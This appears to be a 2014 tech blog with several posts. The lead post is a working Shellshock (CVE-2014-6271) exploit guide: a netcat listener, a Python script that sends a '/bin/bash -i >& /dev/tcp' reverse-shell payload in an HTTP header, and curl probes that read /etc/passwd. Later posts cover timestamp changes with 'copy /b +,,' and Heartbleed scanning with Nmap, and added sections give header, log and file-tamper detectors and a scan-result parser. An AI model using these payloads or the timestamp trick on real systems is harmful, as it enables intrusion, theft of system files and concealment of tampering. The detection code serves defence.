Monday, October 20, 2014

How to get a reverse shell with the Bash (Shellshock) vulnerability

Prerequisites:
1. Kali Linux
2. Download the Python code from http://pastebin.com/166f8Rjx and save it as "shellshock.py"
3. If the target site uses HTTPS, change line 12 to conn = httplib.HTTPSConnection(sys.argv[1]); I saved that version as "shellshocks.py"
4. Your Kali Linux IP
5. The vulnerable host's IP


Steps

1. Run "nc -lvp 9999" to listen on port 9999; you can change the port number if you want.

2. Open another window and run "python shellshocks.py 10.10.x.x /ucsm/isSamInstalled.cgi 172.16.x.x/9999". 10.10.x.x is the vulnerable host; 172.16.x.x is my Kali Linux IP.

3. Now you get the shell:



Some commands that can be used to verify Shellshock:
1. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" https://10.10.x.x/ucsm/isSamInstalled.cgi
2. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/cat /etc/passwd" https://10.10.x.x/ucsm/isSamInstalled.cgi
3. curl --insecure -A "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit" https://10.10.x.x/ucsm/isSamInstalled.cgi

Appendix: the source code (from http://pastebin.com/166f8Rjx)
#
# CVE-2014-6271 cgi-bin reverse shell (Python 2: httplib and the print statement)
#

import httplib, urllib, sys

if (len(sys.argv) < 4):
    print "Usage: %s <host> <cgi-path> <ip/port>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])  # line 12: use httplib.HTTPSConnection for HTTPS targets
reverse_shell = "() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

# The payload travels in a custom request header; the CGI handler exports it into the environment
headers = {"Content-type": "application/x-www-form-urlencoded",
           "test": reverse_shell}
conn.request("GET", sys.argv[2], headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
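Every probe on this page, whether it rides in User-Agent, in curl's -A header or in the script's custom "test" header, starts with the same Bash function-import signature, "() {". The following detector is an added example, not part of the original post or the pastebin script: it looks for that signature in raw HTTP request headers and in combined-format access log lines. The request and log samples are constructed, and "echo PROBE" is a placeholder for whatever follows the signature.

```python
import re

# Signature of the CVE-2014-6271 function-import trick: a header value that
# begins with "() {" (whitespace variations allowed).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def scan_request_headers(raw_request):
    """Return the names of headers in one raw HTTP request whose value carries
    the Shellshock signature. Only the header block is inspected; the request
    line and the body are skipped. CRLF and LF line endings are both accepted."""
    head = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)[0]
    hits = []
    for line in re.split(r"\r?\n", head)[1:]:
        name, sep, value = line.partition(":")
        if sep and SHELLSHOCK_RE.search(value):
            hits.append(name.strip())
    return hits


def scan_access_log(lines):
    """Scan Apache/nginx combined-format access log lines and return
    (line number, source ip, request path) for each line carrying the
    signature. Only headers the server logs (normally Referer and
    User-Agent) are visible here; a payload in a custom header such as
    the script's "test" header only shows up in a full-request capture,
    which scan_request_headers covers."""
    flagged = []
    for n, line in enumerate(lines, 1):
        if not SHELLSHOCK_RE.search(line):
            continue
        src = line.split(" ", 1)[0]
        m = re.search(r'"[A-Z]+ (\S+) HTTP/', line)
        path = m.group(1) if m else "?"
        flagged.append((n, src, path))
    return flagged


# Constructed samples (not real traffic): a benign request, a User-Agent
# probe like the curl examples, and a custom-header probe like the script.
SAMPLE_REQUESTS = [
    "GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\nHost: 10.10.0.5\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n",
    "GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\nHost: 10.10.0.5\r\n"
    "User-Agent: () { :;}; echo PROBE\r\n\r\n",
    "GET /cgi-bin/test.cgi HTTP/1.1\r\nHost: 10.10.0.5\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "test: () { ignored;}; echo PROBE\r\n\r\n",
]

# Constructed combined-format log lines (not real log data).
SAMPLE_LOG = [
    '10.10.0.9 - - [20/Oct/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '172.16.0.7 - - [20/Oct/2014:10:00:02 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" 200 0 "-" "() { :;}; echo PROBE"',
    '172.16.0.7 - - [20/Oct/2014:10:00:03 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" 200 0 "-" "X: () { :;}; echo PROBE"',
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(scan_request_headers(req))
    print(scan_access_log(SAMPLE_LOG))
```

The access-log scanner is the cheaper of the two checks but also the blinder one: it only sees the headers the server chooses to log, so a request like the one the script sends (payload in a header named "test") passes through it unnoticed, and the full-request scanner, fed from a proxy or packet capture, is what catches that case.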

Wednesday, August 13, 2014

Change file timestamp in Windows

Sometimes you need to modify a file's timestamp without changing the content of the file. The copy command has an easy way to do it:

copy /b filename.ext +,,

This command assigns the current date and time to filename.ext without modifying its content. It replaces the original file in place, so make sure you have a backup of the file first.

For reference, check: http://technet.microsoft.com/en-us/library/bb490886.aspx
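The same trick is what a reviewer of a file system has to recognise from the other side: a file whose modification time moved while its bytes did not. The snippet below is an added example, not part of the original post; it snapshots a directory as (content hash, mtime) pairs and classifies each file's change as content, timestamp-only, added, removed or unchanged. The demo uses os.utime as a portable stand-in for copy /b filename.ext +,, on a constructed temporary directory.

```python
import hashlib
import os
import tempfile
import time


def file_state(path):
    """Return (sha256 hex digest of the content, modification time) for one file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest(), os.stat(path).st_mtime


def snapshot(directory):
    """Map relative path -> (hash, mtime) for every regular file under directory."""
    state = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            state[os.path.relpath(full, directory)] = file_state(full)
    return state


def diff_snapshots(before, after):
    """Classify every file seen in either snapshot. A file whose hash is
    unchanged but whose mtime moved is reported as 'timestamp-only', which
    is exactly what the copy /b +,, trick produces."""
    result = {}
    for rel in set(before) | set(after):
        if rel not in before:
            result[rel] = "added"
        elif rel not in after:
            result[rel] = "removed"
        else:
            (h0, m0), (h1, m1) = before[rel], after[rel]
            if h0 != h1:
                result[rel] = "content"
            elif m0 != m1:
                result[rel] = "timestamp-only"
            else:
                result[rel] = "unchanged"
    return result


def demo():
    """Build a constructed directory, re-stamp one file, edit another, and diff."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("filename.ext", "other.txt", "static.bin"):
            with open(os.path.join(d, name), "wb") as f:
                f.write(b"constructed sample content for " + name.encode())
        before = snapshot(d)
        # Re-stamp filename.ext only: same bytes, mtime moved 60 s forward
        # (portable stand-in for: copy /b filename.ext +,,)
        t = time.time() + 60
        os.utime(os.path.join(d, "filename.ext"), (t, t))
        # Genuinely modify other.txt
        with open(os.path.join(d, "other.txt"), "ab") as f:
            f.write(b"!")
        after = snapshot(d)
        return diff_snapshots(before, after)


if __name__ == "__main__":
    for rel, verdict in sorted(demo().items()):
        print(rel, verdict)
```

A hash-plus-mtime baseline is the minimum needed to tell the two cases apart; mtime alone cannot, because both the re-stamp and a real edit move it.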

Tuesday, July 15, 2014

Office 365 report links


The odd thing about Office 365 reports is that some of them cannot be obtained from the admin portal. Below are the links for these reports:

However, this cannot handle results that run to thousands of lines; for those you will have to install an Excel add-in: http://www.microsoft.com/en-us/download/details.aspx?id=30716

Tuesday, April 22, 2014

Use Nmap to detect the OpenSSL Heartbleed vulnerability

Nmap 6.46 (http://nmap.org/download.html) includes the OpenSSL Heartbleed script (ssl-heartbleed):


To use it, below is a sample command:

nmap -sV -v -p 0-65535 --script=ssl-heartbleed -iL ./hosts.txt -oX ./result.xml

Parameter description:
-sV: probe open ports to determine service/version info
-v: increase verbosity level
-iL: input from a list of hosts/networks
-oX: output the scan in XML format

A sample output is shown below:



If for some reason you cannot install Nmap 6.46, you can manually download ssl-heartbleed.nse from http://nmap.org/nsedoc/scripts/ssl-heartbleed.html and put it in the Nmap scripts folder. The Heartbleed script needs the tls library; download it from http://nmap.org/nsedoc/lib/tls.html and put it in the Nmap nselib folder.
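The -oX result.xml from the command above is what you would feed into a ticketing or tracking process, and the useful part is the per-port state the ssl-heartbleed script records. The parser below is an added example, not part of the original post or of Nmap: it walks the XML and lists every port the script ran against together with its state, preferring the structured elem key="state" entry and falling back to the free-text output attribute when that is all a script element carries. The XML sample is constructed (not a real scan) and follows the layout of Nmap's XML output.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for result.xml: one host with a vulnerable TLS port
# and a safe one, and a second host with no TLS service at all.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="6.46">
  <host>
    <status state="up"/>
    <address addr="10.10.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="https"/>
        <script id="ssl-heartbleed" output="&#10;  VULNERABLE:&#10;    State: VULNERABLE">
          <table key="CVE-2014-0160">
            <elem key="title">The Heartbleed Bug</elem>
            <elem key="state">VULNERABLE</elem>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="8443">
        <state state="open"/>
        <service name="https-alt"/>
        <script id="ssl-heartbleed" output="&#10;  NOT VULNERABLE"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.10.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def classify_output(output):
    """Fallback classification of the script's free-text output attribute.
    'NOT VULNERABLE' is tested first because it contains 'VULNERABLE'."""
    if "NOT VULNERABLE" in output:
        return "NOT VULNERABLE"
    if "VULNERABLE" in output:
        return "VULNERABLE"
    return "UNKNOWN"


def heartbleed_findings(xml_text):
    """Return one dict per port on which ssl-heartbleed ran, with host,
    protocol, port number and the state the script reported."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:  # explicit None check: Element truthiness means "has children"
            addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            for script in port.findall("script"):
                if script.get("id") != "ssl-heartbleed":
                    continue
                state_el = script.find(".//elem[@key='state']")
                if state_el is not None and state_el.text:
                    state = state_el.text.strip()
                else:
                    state = classify_output(script.get("output", ""))
                findings.append({"host": addr, "proto": port.get("protocol"),
                                 "port": int(port.get("portid")), "state": state})
    return findings


def vulnerable_services(xml_text):
    """Sorted (host, port) pairs the script marked VULNERABLE."""
    return sorted((f["host"], f["port"])
                  for f in heartbleed_findings(xml_text) if f["state"] == "VULNERABLE")


if __name__ == "__main__":
    for f in heartbleed_findings(SAMPLE_XML):
        print("%(host)s %(proto)s/%(port)d %(state)s" % f)
    print("vulnerable:", vulnerable_services(SAMPLE_XML))
```

Ports with no script element (the SSH port above) are simply absent from the findings, which is the right reading: the script was not run there, so nothing is known either way.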